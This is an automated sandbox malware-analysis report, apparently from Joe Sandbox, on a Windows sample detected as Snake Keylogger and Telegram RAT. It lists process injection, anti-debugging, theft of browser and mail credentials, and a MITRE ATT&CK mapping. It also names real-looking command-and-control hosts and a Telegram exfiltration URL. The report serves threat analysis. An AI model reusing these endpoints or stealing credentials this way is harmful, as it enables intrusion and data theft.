Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Code function: 0_2_04FE01F8 CheckRemoteDebuggerPresent,

0_2_04FE01F8

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76B008	Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Users\user\Desktop\5qJ6QQTcRS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Masquerading	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Access Token Manipulation	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Disable or Modify Tools	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	3 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
5qJ6QQTcRS.exe	75%	ReversingLabs	Win32.Trojan.DarkTortilla
5qJ6QQTcRS.exe	67%	Virustotal		Browse
5qJ6QQTcRS.exe	100%	Avira	HEUR/AGEN.1305727
5qJ6QQTcRS.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	InstallUtil.exe, 00000004.00000002.2545353858.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://www.office.com/lB	InstallUtil.exe, 00000004.00000002.2545353858.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a	InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588845
Start date and time:	2025-01-11 06:12:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5qJ6QQTcRS.exe renamed because original name is a hash value
Original Sample Name:	e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 97% Number of executed functions: 231 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 8132 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:13:28	API Interceptor	53450x Sleep call for process: 5qJ6QQTcRS.exe modified
00:14:34	API Interceptor	39634x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.112.1	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
158.101.44.242	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
